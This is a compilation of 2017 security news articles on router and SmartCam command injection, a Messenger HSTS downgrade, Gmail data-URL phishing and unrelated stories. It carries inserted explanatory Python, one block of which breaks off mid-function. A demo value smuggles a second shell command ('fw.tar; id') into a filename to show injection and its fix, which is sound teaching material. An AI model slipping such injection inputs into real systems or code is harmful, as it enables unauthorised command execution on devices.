The security researcher Pedro Ribeiro from Agile Information Security disclosed multiple flaws in a number of routers distributed by the Thai ISP TrueOnline.

The Thai ISP distributes several rebranded ZyXEL and Billion routers to its customers.

The models ZyXEL P660HN-T v1, ZyXEL P660HN-T v2 and Billion 5200W-T contain a number of default administrative accounts, and their web interfaces are affected by command injection vulnerabilities. On Monday Ribeiro published proof-of-concept exploits, releasing Metasploit modules for the vulnerabilities in the routers.


All the routers are still in widespread use in Thailand, with the Billion 5200W-T router currently being distributed to new customers.

“TrueOnline is a major Internet Service Provider in Thailand which distributes various rebranded ZyXEL and Billion routers to its customers. Three router models – ZyXEL P660HN-T v1, ZyXEL P660HN-T v2 and Billion 5200W-T – contain a number of default administrative accounts, as well as authenticated and unauthenticated command injection vulnerabilities in their web interfaces, mostly in the syslog remote forwarding function.” reads the advisory. “All the routers are still in widespread use in Thailand, with the Billion 5200W-T router currently being distributed to new customers.”

Ribeiro reported the vulnerabilities via the SecuriTeam Secure Disclosure Program, which notified the vendors in July.

The devices are based on the TC3162U system-on-a-chip (SoC) manufactured by TrendChip; the flawed routers come in two firmware variants, called “ras” and “tclinux.”

Ribeiro discovered the vulnerabilities in the ‘tclinux’ variant: several ASP files in its web interface are affected by command injection issues.

“It should be noted that tclinux contains files and configuration settings in other languages (for example in Turkish). Therefore it is likely that these firmware versions are not specific to TrueOnline, and other ISP customised routers in other countries might also be vulnerable,” added Ribeiro. “It is also possible that other brands and router models that use the tclinux variant are also affected by the command injection vulnerabilities (the default accounts are likely to be TrueOnline specific).”

The researcher explained that the majority of the vulnerabilities can be exploited remotely, by both authenticated and unauthenticated attackers.

The ZyXEL P660HN-T v1 router is affected by an unauthenticated command injection issue that can be exploited remotely.

“This router has a command injection vulnerability in the Maintenance > Logs > System Log > Remote System Log forwarding function. The vulnerability is in the ViewLog.asp page, which is accessible unauthenticated. The following request will cause the router to issue 3 ping requests to

POST /cgi-bin/ViewLog.asp HTTP/1.1


The ZyXEL P660HN-T v2 router is affected by the same issue, but it can be exploited remotely only by authenticated attackers.

“Unlike in the P660HN-Tv1, the injection is authenticated and in the logSet.asp page. However, this router contains a hardcoded supervisor password (see below) that can be used to exploit this vulnerability. The injection is in the logSet.asp page that sets up remote forwarding of syslog logs, and the parameter vulnerable to injection is the serverIP parameter” states the advisory.

The third router distributed by the Thai ISP is the Billion 5200W-T, which is affected by both unauthenticated and authenticated command injection issues. According to the researcher, one flaw resides in its adv_remotelog.asp page.

“The Billion 5200W-T router also has several other command injections in its interface, depending on the firmware version, such as an authenticated command injection in tools_time.asp (uiViewSNTPServer parameter),” Ribeiro said. “It should be noted that this router contains several hardcoded administrative accounts that can be used to exploit this vulnerability.”

All the versions use default and weak admin credentials that were remotely accessible.

President Obama commutes Chelsea Manning sentence
18.1.2017 securityaffairs BigBrothers
President Barack Obama has commuted Chelsea Manning’s sentence for leaking confidential documents to WikiLeaks in 2010. Manning will be released on May 17th.
In a historic decision, President Barack Obama has commuted Chelsea Manning’s sentence for leaking classified documents to WikiLeaks in 2010. The news was reported by The New York Times; Manning is due to be released on May 17th.

Chelsea Manning, born Bradley Manning, was sentenced to 35 years in 2013 for passing diplomatic cables to the anti-secrecy group WikiLeaks while serving in the US Army.

The data leak was one of the largest breaches of classified documents in the history of the United States.

At the time of the data leak, Bradley Manning was serving as an intelligence analyst in Iraq. Manning provided more than 700,000 documents to WikiLeaks; the huge trove includes the video of a 2007 airstrike in Baghdad that killed two Reuters employees.

WikiLeaks recently announced Assange’s intention to agree to US extradition if Obama granted Manning clemency.

WikiLeaks (@wikileaks), 8:40 PM - 12 Jan 2017:
If Obama grants Manning clemency Assange will agree to US extradition despite clear unconstitutionality of DoJ case https://twitter.com/wikileaks/status/765626997057921025 …
WikiLeaks (@wikileaks), 11:29 PM - 17 Jan 2017:
Assange: "Thank you to everyone who campaigned for Chelsea Manning's clemency. Your courage & determination made the impossible possible."
“Obama may well have just saved Chelsea Manning’s life,” commented Sarah Harrison, who has defended Manning as Acting Director of the Courage nonprofit. “Freeing her is clearly and unambiguously the right thing to do.”

She nevertheless maintained her criticism of the Obama administration’s decision to prosecute Manning under the Espionage Act.

“Today’s news will not make good the harm done on Obama’s watch,” Harrison added. “Chelsea’s conviction under the Espionage Act and 35-year sentence set a terrible precedent that is left entirely intact by this commutation. Who knows what Donald Trump will do with this precedent, and these powers, that Obama has left him?”
Manning’s commutation was part of a larger round of clemency by the US government that resulted in 209 commutations and 64 pardons. President Obama issued 1,385 commutations during his administration, more than any president before him.


Hackers demonstrate how to hack Samsung SmartCam
17.1.2017 securityaffairs Hacking

Researchers Exploitee.rs discovered a flaw in Samsung SmartCam IP cameras that could be exploited to execute commands and hijack vulnerable devices.
Samsung SmartCam IP cameras are affected by a serious vulnerability that could be exploited by remote attackers to execute commands and hijack vulnerable devices.
Samsung Electronics sold the Samsung Techwin security division to the Hanwha Group in 2014, but Hanwha's SmartCam products are still sold under the Samsung brand.

In 2014 at DEFCON 22, security experts at Exploitee.rs revealed a number of exploits that could have been used to execute arbitrary commands on Samsung SmartCam. An attacker could use the exploits to change device settings, including the administrator password.

A few months ago, the experts from Pen Test Partners also reported security issues in Samsung SmartCam products.

The researchers focused their analysis on the Samsung-branded indoor IP camera SNH-6410BN and noticed, for example, that the device still had SSH and a web server running, potential open doors for attackers.

Samsung responded by disabling SSH and local access to the web interface; users now access the Samsung SmartCam through the SmartCloud online service.

Researchers at Exploitee.rs conducted a new test session on the device and found a way to enable the Telnet service and the local web interface by exploiting a command injection flaw in a set of scripts that the vendor had not removed.

“Today we’re re-visiting a device that we’ve hacked in a previous session. At DEFCON 22, we released exploits for the Samsung Smartcam network camera in our “Hack All The things” presentation. These exploits allowed for remote command execution and the ability to arbitrarily change the camera’s administrator password.” states the analysis published by Exploitee.rs.

The scripts exploited by the researchers belong to the iWatch webcam monitoring service and implement its firmware update functionality. The researchers discovered a root command execution issue in the iWatch Install.php script.

“The iWatch Install.php vulnerability can be exploited by crafting a special filename which is then stored within a tar command passed to a php system() call,” researchers explained. “Because the web-server runs as root, the filename is user supplied, and the input is used without sanitization, we are able to inject our own commands within to achieve root remote command execution.”

Researchers at Exploitee.rs have also released a proof-of-concept (PoC) code for the vulnerability, and a fix. The exploit works with the SNH-1011 model, but researchers believe all Samsung SmartCam devices are affected.

“The vulnerability can be patched by first logging in to the server after spawning a shell with the POC curl command above, then running the following command.”

sed -i -e 's/" . $file . "/" . escapeshellarg($file) . "/' /mnt/custom/iwatch/web/install.php
Researchers have warned that enabling the web interface reintroduces some of the older vulnerabilities previously discovered.
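The SmartCam install.php flaw (a user-supplied filename concatenated into a tar command handed to PHP's system()) and the TrueOnline router flaws described earlier (a syslog server address concatenated into a shell command behind the web interface) are the same defect, so one added example serves both. It is written in Python rather than the PHP and ASP of the real firmware, and it is not the researchers' code: the tar command shape, the /tmp/fw path and the busybox-style `syslogd -R` argv are assumptions. It shows what a shell sees before and after the escapeshellarg() one-liner above, and the stricter fix for the router case, validating the parameter against an allow-list and never building a shell string at all.

```python
"""Command injection through an unquoted parameter, modelled in Python.
Added example, not the advisory authors' code: the real targets are PHP
(SmartCam install.php) and ASP (router syslog forwarding); the tar command
shape, /tmp/fw and the busybox-style `syslogd -R` argv are assumptions."""
import ipaddress
import shlex
from typing import List

# Tokens a POSIX shell treats as command separators. This is a rough model
# (command substitution with $(...) or backticks is not counted); it is
# enough to show the difference quoting makes.
SHELL_SEPARATORS = {";", "&", "&&", "|", "||"}


def shell_words(cmd: str) -> List[str]:
    """Split cmd roughly as a POSIX shell would: unquoted ; & | ( ) become
    tokens of their own, while anything inside quotes stays one word."""
    lex = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    return list(lex)


def command_count(cmd: str) -> int:
    """How many simple commands the shell would run for cmd."""
    return 1 + sum(1 for w in shell_words(cmd) if w in SHELL_SEPARATORS)


# --- SmartCam pattern: user-supplied filename pasted into a tar command ---

def build_unpack_cmd_unsafe(filename: str) -> str:
    """The flawed concatenation the advisory describes (PHP: "..." . $file . "...").
    Kept only to show what the shell sees; never execute it with untrusted input."""
    return "tar -xf " + filename + " -C /tmp/fw"


def build_unpack_cmd_safe(filename: str) -> str:
    """The published one-line fix wraps $file in escapeshellarg(); shlex.quote
    is the Python equivalent, so metacharacters stay inside a single word."""
    return "tar -xf " + shlex.quote(filename) + " -C /tmp/fw"


# --- Router pattern: the syslog serverIP parameter reaches a shell ---

def is_valid_syslog_server(value: str) -> bool:
    """Allow-list check: the parameter must be an IPv4/IPv6 literal and
    nothing else. Stricter than quoting, it also blocks option injection."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False


def build_syslog_argv(server: str) -> List[str]:
    """Build an argv list instead of a shell string: with no shell involved
    there is nothing to inject into, and the validated address is one opaque
    argument. (-R HOST is busybox syslogd's remote-forwarding flag; the
    routers' real command is not known from the advisory.)"""
    if not is_valid_syslog_server(server):
        raise ValueError(f"rejected syslog server value: {server!r}")
    return ["syslogd", "-R", str(ipaddress.ip_address(server))]


if __name__ == "__main__":
    payload = "fw.tar; id"  # constructed, harmless demo input
    unsafe, safe = build_unpack_cmd_unsafe(payload), build_unpack_cmd_safe(payload)
    print(shell_words(unsafe), command_count(unsafe))  # a second command appears
    print(shell_words(safe), command_count(safe))      # one command, one filename
    print(build_syslog_argv("192.0.2.10"))
```

Quoting is the right minimal patch for the install.php case because the filename legitimately has to be passed through to tar; for a field that is only ever an IP address, as in the routers' syslog forwarding, validating the value and dropping the shell entirely removes the class of bug rather than escaping one instance of it.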

How To Stop Larry From Hacking Your WiFi in 2017
17.1.2017 thehackernews Hacking
It’s 2017, and we’re not any further along with Wi-Fi security than we were 10 years ago. There are Intrusion Detection Systems and 2nd generation antivirus apps to protect us from some vulnerabilities, but the simple fact is that some people and businesses still don’t set their networks up well in the first place.
Installing WiFi is like running Ethernet to your parking lot. It’s a cliché, but it is often true.
If I can attack your network sitting in my car from the parking lot, what chance do you have? And 99% of the time I’m successful.

Lots of companies are moving to new offices that have wide open office layouts. Some may not have BYOD policies or wireless security plans in place, and anyone can bring their own device to work that you may not know about.
I’ve even seen some companies installing IoT devices like smart LED light bulbs and thermostats, and even security camera systems that are always running unsecured with default passwords.
So what can you do to stop people like me from exploiting weaknesses in your wireless networks and pwning your company?
Pwnie Express (@PwnieExpress), 7:56 PM - 16 Jan 2017:
We're sorry, but your new password must contain an upper case letter, a number, a punctuation mark and a gang sign 😳🤔
Be sure WEP does not exist in your infrastructure. WEP is the weakest of the weak for encryption but was a reaction to open networks early on. If enough packets are observed, the key can be brute forced easily. Remember doing that like 15 years ago?
WPA/WPA2 PSK can be your friend. It’s mostly secure, but there are still things you need to lock down to be sure.
Create a plan on what to do when an attack happens. Develop and implement a wireless security policy. Be ready when you do detect a rogue device or when someone’s banging on your network from the parking lot.

Want to watch us talk about penetration testing and hear stories from the 200 clients who hired me to hack into their networks?
We’re running a webinar tomorrow with Pwnie Express and Larry Pesce.
You can sign up here, and I’ll send you the link to watch us as well as a guide for 2017 on how you can lock down wireless networks and keep people like me out of your company's networks.

How EaseUS Partition Master Can Easily Manage Your Hard Disk
17.1.2017 thehackernews IT
If you want to get the most out of your computer, you need to get the most out of your hard drive, where all your data is stored.
Today hard drives are larger than ever, so it makes sense for you to partition your hard disk to effectively use all of its space and manage all your important information.
Partitioning is also useful if you intend to install and use more than one operating system on the same computer.
There is a vast business of partition manager software out there, and today we are reviewing one of the most popular partition management tools available in the market: EaseUS Partition Master Professional.
EaseUS Partition Master Professional offers you the complete package with capabilities for organizing and resizing your drive, restoring and backing up your information, improving system performance, installing and managing several operating systems on the same computer, along with recovering and cloning data files.
Let's dig deep into the capabilities provided by the EaseUS Partition Master Professional software.
Resize, Move Or Merge Multiple Partitions

At some point you may have struggled with low space in one partition of your hard disk while others sat largely unused with plenty of space. In that situation, you can choose to merge two partitions into a larger system partition.

But resizing or combining your system and boot partition C drive, which holds your Operating System, without any third party tool is not always a good idea, as there are chances of data loss.
So, in that case, users are always advised to use a third-party partition tool from a reputable and trustworthy company.
EaseUS partition software can get this job done with ease.
EaseUS Partition Master Professional provides a one-click, easy-to-use interface to help you move, resize, merge, hide or unhide existing disk partitions without damaging even a single bit of the original data.
All you need to do is launch the EaseUS Partition Master Professional software, choose the disk partition you want to process and right click on it, and you’ll get the list of all the available operations that can be performed.
Once you resize or move your partitions, you are advised to backup your data.
Migrate OS to SSD/HDD Without Reinstalling Windows

One of the major features of EaseUs Partition Master Professional is the ability to migrate your operating system to another hard drive (SSD or HDD).
So, if you are upgrading your old PC for better performance, this tool also allows you to transfer all your data on system and boot partitions, including OS and installed applications, without reinstalling the operating system on the new drive.
To migrate your OS from HDD to SSD, all you need to do is launch the application, click on Wizard and then select 'Migrate OS to SSD/HDD' from the main menu. Now select SSD as destination disk, delete partitions on the target drive, resize partitions on the target disk, and then click Finish.
Moreover, it also supports MBR and GPT disks.
Bootable Partition Manager (CD/DVD/USB)

The tool also enables users to manage hard disk partitions even when their OS fails to boot or manage partitions without an operating system.
For users looking for a bootable USB flash drive partition manager that can resize partitions, EaseUS Partition Master is a good pick.

To create a bootable USB flash drive partition manager, you first need to download and launch EaseUS Partition Master, then select Tool → Create WinPE bootable disk → USB and then start to create a USB bootable disk of EaseUS Partition Master.
After that, you can launch EaseUS Partition Master from bootable USB device or CD/DVD and manage your hard drive partitions.
Copy/Clone Partition

If ransomware malware strikes, only a good backup can save your files and money, and EaseUS Partition Master helps you do just that.
The Partition Copy and Disk Copy features integrated into EaseUS Partition Master are specially designed to provide protection from data loss.
The Partition Copy feature is meant to back up your partitions before partition operations are applied to the hard disk, to prevent data loss from a program error or other accident.
Partition Copy lets you copy a partition to unallocated space on your hard disk, and even lets you resize the unallocated space during the procedure if necessary.
On the other hand, Disk Copy lets you not only make a backup copy of your hard drive but also allows you to copy your entire system from a small hard disk to a larger hard drive.
Securely Erase Data on SSD or HDD

If you've just got a new PC and want to sell your old one, make sure all your data has been cleared securely and can not be recovered anyhow.
When you delete a file, it is not actually erased; the deleted file still exists, and your PC only removes its indexing information from the hard drive.
So, if that deleted data is not overwritten, it can be recovered later, which may include your passwords, private photographs, personal information, classified documents or financial records.
So, always be sure to securely erase your data before selling or throwing away your device.
Using EaseUS Partition Master, you can securely delete your files or an entire drive so that they cannot be recovered.
To do so, first, launch EaseUS Partition Master Free, select the SSD or hard disk you want to erase, and then right click and select "Wipe disk."
The tool will then ask you to set the number of times (1-10) to wipe your hard drive; click "OK." A dialog box will appear saying your computer will restart after the disk is erased. Just click "OK" and then click "Apply" to securely erase the SSD or HDD.
Note: If you are erasing your entire hard disk, make sure that it does not include system partition because your system will not boot after wiping the drive.
Support and Compatibility (OS, File System, Drive Type)
The free version of EaseUS Partition Master supports up to 8TB hard disks while the professional version supports up to 16TB disks and 32 disks at most.
Talking about the operating system, EaseUS Partition Master supports Windows 10, 8.1, 8 and 7 SP1, and 32-bit and 64-bit versions of Windows 7, Vista and Windows XP Home Edition and Professional.
EaseUS Partition Master supports MBR and GPT disks – GPT disks are faster than MBR and help with high-capacity hard disk drives. So if you want to convert your regular MBR hard disk drive into GPT, you can use EaseUs that'll do it without any data loss.
EaseUS Partition Master supports a range of file systems as well, including EXT3, EXT2, NTFS, FAT32, FAT16, FAT12, and ReFS. It also supports different device types, including Solid-State Drives (SSD), IEEE 1394 (FireWire) HDDs, USB 1.0/2.0/3.0 HDDs, all levels of SCSI, IDE and SATA RAID controllers, full support for RAID configurations (hardware RAIDs), and removable devices such as flash drives and memory cards.
EaseUs is one of the top disk management software developers out there, and its Partition Master Professional software stands up to its name.
Conclusion: EaseUs Partition Master Professional is a complete solution for managing, copying and recovering your disk partitions within only a few simple clicks. A large number of superb partitioning and solid additional features as well as the user-friendly interface place EaseUS Partition Master near the top and make it difficult to beat.
So, if you are looking for an effective partition manager, you should give it a try, as it's worth every single penny.
EaseUS Partition Master Professional Edition costs just $39.95, while its Server Edition costs $159.00 and Home Edition is free. You can also take a Free Trial of EaseUS Partition Master Professional Edition.
If this partition tool meets all your requirements, you can purchase EaseUS Partition Master Pro at a highly discounted price through The Hacker News. We are giving our readers a 50% discount on EaseUS Partition Master Pro.
Just use SEO-LGR-85D coupon code at the time of checkout.

Simple Hack Lets Hackers Listen to Your Facebook Voice Messages Sent Over Chat
17.1.2017 thehackernews
Most people hate typing long messages while chatting on messaging apps, but the voice recording feature provided by WhatsApp and Facebook Messenger makes it much easier for users to send longer messages that would otherwise take a lot of typing effort.
If you too have a habit of sending audio clips instead of typing long messages to your friends over Facebook Messenger, you are susceptible to a simple man-in-the-middle (MITM) attack that could leak your private audio clips to attackers.
What's more worrisome is that the issue is still not patched by the social media giant.

Egyptian security researcher Mohamed A. Baset told The Hacker News about a flaw in Facebook Messenger's audio clip recording feature that could allegedly allow any man-in-the-middle attacker to grab your audio clip files from Facebook's server and listen to your personal voice messages.
Let's understand how this new attack works.
Here's How Attackers can Listen to your Personal Audio Clips:

Whenever you record an audio clip (voice message) to send to your friend, the clip gets uploaded onto Facebook's CDN server (i.e., https://z-1-cdn.fbsbx.com/...), which then serves the same audio file, over HTTPS, to both the sender and the receiver.
Now, any attacker sitting on your network and running a MITM attack with SSLStrip can extract the absolute links (including the secret authentication token embedded in the URL) to all audio files exchanged between sender and receiver during that process.
Then, the attacker downgrades those absolute links from HTTPS to HTTP, which allows them to download those audio files directly without any authentication.
That's it.

You might be wondering how hackers are able to download your audio files so easily.
What went Wrong?
This is because Facebook's CDN server does not enforce an HTTP Strict Transport Security (HSTS) policy. HSTS forces browsers and other user agents to communicate with a server only over HTTPS connections, which protects websites against protocol downgrade attacks.
Secondly, there is a lack of proper authentication: if a file has been shared between two Facebook users, it should not be accessible by anyone except them, even if someone has the absolute URL to the file, including the secret token that grants access to it.
As an example, Mohamed sent an audio clip to one of his friends over Facebook Messenger, and here is the absolute link to the audio file extracted using a MITM attack, which anyone, even you, can download from Facebook's server without any authentication.
"GET requests are something that browsers can remember in their cache and also in their history. Better to have these files played via POST requests with an anti-CSRF token implemented," Mohamed told The Hacker News.
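The two gaps above, a CDN host without HSTS and a capability token carried in a GET URL that caches and history remember, can both be checked from a single response. The following Python is an added example with constructed inputs (it is not Facebook's code or the researcher's); the host name, the header values and the list of token parameter names are assumptions.

```python
"""Audit a CDN media response for the two weaknesses discussed above:
no (or weak) HSTS, and a tokenised GET URL that caches and history keep.
Added example with constructed inputs; it is not Facebook's code."""
from dataclasses import dataclass
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

ONE_YEAR = 31536000                       # common minimum max-age guidance
TOKEN_PARAMS = ("oh", "token", "sig")     # assumed names of capability tokens


@dataclass
class HstsPolicy:
    max_age: int
    include_subdomains: bool = False
    preload: bool = False


def parse_hsts(header: Optional[str]) -> Optional[HstsPolicy]:
    """Parse a Strict-Transport-Security value as RFC 6797 describes.

    Returns None when the header is absent or invalid (missing or non-numeric
    max-age, duplicated directives); user agents then apply no policy at all.
    """
    if header is None:
        return None
    max_age = None
    include_sub = preload = False
    seen = set()
    for raw in header.split(";"):
        directive = raw.strip()
        if not directive:
            continue
        name, _, value = directive.partition("=")
        name = name.strip().lower()
        value = value.strip().strip('"')
        if name in seen:                  # duplicates make the header invalid
            return None
        seen.add(name)
        if name == "max-age":
            if not value.isdigit():
                return None
            max_age = int(value)
        elif name == "includesubdomains":
            include_sub = True
        elif name == "preload":
            preload = True
        # unknown directives are ignored, as the RFC requires
    if max_age is None:
        return None
    return HstsPolicy(max_age, include_sub, preload)


def audit_response(url: str, headers: Dict[str, str]) -> List[str]:
    """Return findings for a media URL and the response headers it came with."""
    findings: List[str] = []
    h = {k.lower(): v for k, v in headers.items()}
    parts = urlsplit(url)
    if parts.scheme != "https":
        findings.append("served over plain HTTP: URL and content visible on the wire")
    policy = parse_hsts(h.get("strict-transport-security"))
    if policy is None:
        findings.append("no valid HSTS policy: a downgrade to http:// is possible")
    else:
        if policy.max_age < ONE_YEAR:
            findings.append(f"HSTS max-age {policy.max_age}s is shorter than one year")
        if not policy.include_subdomains:
            findings.append("HSTS lacks includeSubDomains: subdomains of this host stay downgradable")
    if any(name in parse_qs(parts.query) for name in TOKEN_PARAMS):
        cc = h.get("cache-control", "").lower()
        if "no-store" not in cc and "private" not in cc:
            findings.append("capability token in a GET URL without Cache-Control no-store/private")
    return findings


if __name__ == "__main__":
    # Constructed responses: a weak CDN and a hardened one.
    weak = {"Content-Type": "audio/mp4"}
    strong = {"Strict-Transport-Security": "max-age=31536000; includeSubDomains",
              "Cache-Control": "private, no-store"}
    for hdrs in (weak, strong):
        print(audit_response("https://cdn.example/voice.mp4?oh=abc123", hdrs))
```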
Still Unpatched; No Bug Bounty!
Mohamed reported the issue to Facebook, and the company acknowledged it but has not patched it yet. Facebook did not offer the researcher any bug bounty, as downgrade attacks do not fall under its bug bounty program.


Here's what the Facebook security team told Mohamed:
"We are in the process of rolling out HSTS across various facebook.com subdomains. The fact that we have not rolled it out on particular subdomains does not constitute a valid report under our program."
"In general, sending in reports that claim we should be using defense-in-depth mechanisms like HSTS will not qualify under our program. We make very deliberate decisions about when we roll out (or not) particular protections and so reports suggesting that we make changes there generally do not qualify."
You can watch the above proof-of-concept video demonstration, which shows this attack in action.
We have contacted Facebook's security team for comment and will update the story as soon as we hear from the company.

Russian Channel One alleged hacked and BBC Sherlock Final Leaked
17.1.2017 securityaffairs Hacking
On Monday, Russian state television Channel One leaked the BBC Sherlock finale online, and the broadcaster blames hackers.
On Monday, Russian state television Channel One blamed hackers for the online leak of the final episode of the BBC drama Sherlock a day before its scheduled broadcast.

Channel One was set to air the end-of-season episode of the fourth series of Sherlock on Monday just after midnight Moscow time (2100 GMT), simultaneously with the UK.

“The BBC is trying to establish whether an episode of Sherlock was deliberately leaked from within the offices of a Russian state broadcaster, after last night’s hotly-anticipated series finale was circulated on the internet ahead of transmission,” reported The Telegraph.

“A Russian-language version of the 90-minute episode, entitled The Final Problem, appeared online on Saturday, featuring a three-second continuity announcement identifying it as having originated from Channel One, which holds the rights to air Sherlock in Russia.”

According to the Russian broadcaster, hackers broke into its systems and leaked online a full episode professionally dubbed into Russian. Copies of the final episode of the BBC drama Sherlock then appeared across numerous sites.

“According to preliminary findings, the cause was a hacker attack,” Channel One spokeswoman Larisa Krymova revealed to the AFP.

[The channel] “has been in close contact with the BBC from the moment it learnt of the leak and is carrying out an investigation to identify the source of the material uploaded onto the Internet.”

[Channel One] “will be ready to share full information on the incident with colleagues after the investigation is completed,” explained the Channel One spokeswoman.

The BBC confirmed it had launched an investigation on the case.

“We have brought everything up to beyond gold standard, which is why things like this are so surprising. This is more than an accident.” stated a source at the corporation.

“BBC Worldwide takes breaches of our stringent content security protocols very seriously and we have initiated a full investigation into how this leak has occurred.” said a BBC spokesman.

The show’s producer Sue Vertue urged Sherlock fans not to share the illegal copy of the final episode.

Sue Vertue (@suevertue), 14 Jan 2017, 4:54 PM:
Russian version of #Sherlock TFP has been illegally uploaded. Please don't share it. You've done so well keeping it spoiler free. Nearly there
1,999 Retweets 3,934 likes
Analysts believe that the attack was politically motivated and can be considered Russia’s retaliation against the BBC.

“There appears to be no profit motive, no benefit to the broadcaster from doing this. What remains is a political motive. The most obvious explanation is that this is punitive,” explained Ben Nimmo, information defence fellow at the Atlantic Council think tank.

Court Documents Reveal How Feds Spied On Connected Cars For 15 Years
16.1.2017 thehackernews Crime
It's not always necessary to break into your computer or smartphone to spy on you. Today all our day-to-day devices are becoming more connected to networks than ever to add convenience and ease to daily activities.
But here's what we forget: These connected devices can be turned against us because we are giving companies, hackers, and law enforcement a large number of entry points to break into our network.
These connected devices can also be a great boon for law enforcement, which can listen to and track us everywhere.
Let's take the recent example of the 2016 Arkansas murder case, where Amazon was asked to hand over audio recordings from a suspect's Echo.
However, that was not the first case where feds asked a company to hand over data from a suspect's connected device, as they have long retrieved such information from connected cars.
According to court documents obtained by Forbes, United States federal agencies have a 15-year history of "Cartapping" — where vehicle tech providers are ordered to hand over almost real-time audio and location data from a user.
How Police Have Spied On Connected-Cars For Years?
For example, in 2014 satellite radio and telematics provider SiriusXM provided location information on a Toyota 4-Runner following a warrant from New York police, which was recently unsealed.
The warrant asked SiriusXM "to activate and monitor as a tracking device the SIRIUS XM Satellite Radio installed on the Target Vehicle" for ten days, and the company admitted to Forbes that it complied with the order.
How did SiriusXM achieve this? The company simply turned on the stolen vehicle recovery feature of its Connected Vehicle Services technology on the target vehicle, the Toyota 4-Runner. It is like Apple turning on the Find My iPhone feature to track a customer's location, the court documents [PDF] say.
SiriusXM said it works with law enforcement periodically to provide such information on its customers, given a valid warrant. The company receives an estimated five valid court orders a year to monitor a suspect, though it declined to offer on-record comment.
SiriusXM is not alone. General Motors (GM) has repeatedly worked with federal agencies to provide not just location but also audio through its OnStar service, where people's conversations are recorded when the in-car cellular connection is turned on.
According to Forbes, police asked GM to hand over OnStar data in December 2009 from a Chevrolet Tahoe rented by suspected crack cocaine dealer Riley Dantzler.
OnStar's tracking is so accurate that even though the feds had no idea which car Dantzler was driving, it was able to "identify that vehicle among the many that were on Interstate 20 that evening." They followed him from Houston, Texas, to Ouachita Parish, stopped Dantzler and found cocaine, ecstasy and a gun inside the car.
The defense lawyer argued that the court order compelling OnStar to hand over data was made in Louisiana, but since the tracking started in Texas, it went beyond the court jurisdiction.
In a separate case in 2007, OnStar was ordered to track and continuously reveal the physical location of GMC Envoy SUV of suspected heroin dealer Lamauro Coleman as he traveled around Michigan. When he was stopped, the feds found 43 grams of heroin.
Here's what Coleman's representation argued:
"The statute is silent as to the authority of the government to use a 3rd party product in [place] of physically installing a device of their own."
"Allowing this type of intrusion is a leap the court shouldn't be willing to make. Authorizing OnStar agents to activate the system within a suspect's car renders statutory authority null. It effectively makes every single General Motors vehicle and every OnStar service representative an agent of the government."
As for audio data, OnStar competitor ATX Technologies was ordered in 2001 to provide "roving interceptions" of a Mercedes Benz S430V. ATX complied with the order in November and monitored audible communications for 30 days, but declined when the FBI asked for an extension in December, the court documents [PDF] reveal.
In 2007, OnStar was ordered to provide audio data from a Chevrolet Tahoe belonging to Gareth Wilson in Ohio.
An emergency button in Wilson's car was automatically pushed without his knowledge, which allowed an officer from the Fairfield County Sheriff's Office to listen to a conversation about a possible drug deal, reads a 2008 opinion from the case.
After that, when the feds located and searched the car, they found marijuana. It later turned out that Wilson had not even signed up for the OnStar service, but the service had not been switched off.
Wilson later argued that snooping on his conversations and the subsequent search of his vehicle were illegal and violated Ohio's wiretapping and electronic surveillance law.
PRIVACY is just a Word!
In all cases, "attempts to have the evidence thrown out foundered. The government was able to argue that as a warrant was signed off, there was no longer an expectation of privacy," Forbes writes.
Here's the statement provided by a GM spokesperson:
"We don't monitor or otherwise track the location of OnStar-equipped cars unless required by a valid court order in criminal procedures or under exigent circumstances; and we don't release the number of those requests. We take our customers' privacy, safety, and security very seriously, and we assist them on average more than 600 times each month in North America with some form of Stolen Vehicle Assistance."
According to American Civil Liberties Union (ACLU) legislative counsel Neema Singh Guliani, such cases of connected car monitoring are part of a growing trend toward government and law enforcement access to internet-enabled technology.
"Fundamentally, what's happening is the technology is moving at warp speed, and there are more and more ways to get information on people, about their personal activities, but you have the law standing utterly still," Guliani told the publication.
"What's often happening is the police are trying to massage laws that were written at the time, in some cases when we didn't even have the internet or the concept of a telephone, or GPS, and massage them to fit these modern technologies."
So, fuck privacy! When you have a good enough car to be internet connected, always expect to be followed everywhere.
The broader takeaway: Internet-connected devices automating your day-to-day habits could be, at some point, used for or against you, legally.

Insidious phishing attack leverages on fake attachments to steal Gmail credentials
16.1.2017 securityaffairs

Cybercriminals are adopting specially crafted URLs to trick users into entering their Gmail credentials in a new sophisticated phishing campaign.
Security experts have discovered a new and effective Gmail phishing attack that can deceive even tech-savvy people. Crooks leverage specially crafted URLs to trick victims into entering their Gmail credentials on a phishing page.

The malicious messages are sent from one of the victim’s contacts and appear to carry a PDF document that can be previewed directly in Gmail. When the victim clicks on the “attachment” image included in the body of the message, they are redirected to a Gmail phishing page.

The URL to which the images of attachments point is crafted to appear legitimate:


The web browser does not display any certificate warning. Experts noticed that the apparently legitimate part of the URL is followed by white spaces, which keep the suspicious strings out of the victim's view, and then by an obfuscated script that opens a Gmail phishing page in a new tab. A technical description of the Chrome/Gmail attack has been published on GitHub.

Gmail phishing

“You click on the image, expecting Gmail to give you a preview of the attachment. Instead, a new tab opens up and you are prompted by Gmail to sign in again. You glance at the location bar and you see accounts.google.com in there. It looks like this….” states a blog post published by WordFence. “Once you complete sign-in, your account has been compromised.”
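Because the deception lives entirely in the shape of the address-bar URL, it can be checked mechanically: the scheme is data: rather than https:, the visible prefix imitates accounts.google.com, a long run of whitespace follows, and script markup sits at the end. The Python below is an added example (not the researchers' code and not Google's); the trusted-host list and the sample URLs are constructed for the demo.

```python
"""Classify an address-bar URL the way a user would need to before typing
a Gmail password into it. Added example with constructed samples; it is
not the code of the researchers who documented the attack, nor Google's."""
import base64
import re
from typing import List, Tuple
from urllib.parse import unquote, urlsplit

TRUSTED_LOGIN_HOSTS = {"accounts.google.com"}          # assumed allow-list
PADDING_RE = re.compile(r"\s{16,}")                     # whitespace run hiding what follows
SCRIPT_RE = re.compile(r"<\s*script\b|javascript:", re.IGNORECASE)
HOST_RE = re.compile(r"https?://([a-z0-9.-]+)", re.IGNORECASE)


def split_data_url(url: str) -> Tuple[str, bool, str]:
    """Return (media_type, is_base64, decoded_payload) for a data: URL."""
    header, _, payload = url[len("data:"):].partition(",")
    params = header.split(";")
    media_type = params[0] or "text/plain"
    is_b64 = any(p.strip().lower() == "base64" for p in params[1:])
    if is_b64:
        try:
            padded = payload + "=" * (-len(payload) % 4)
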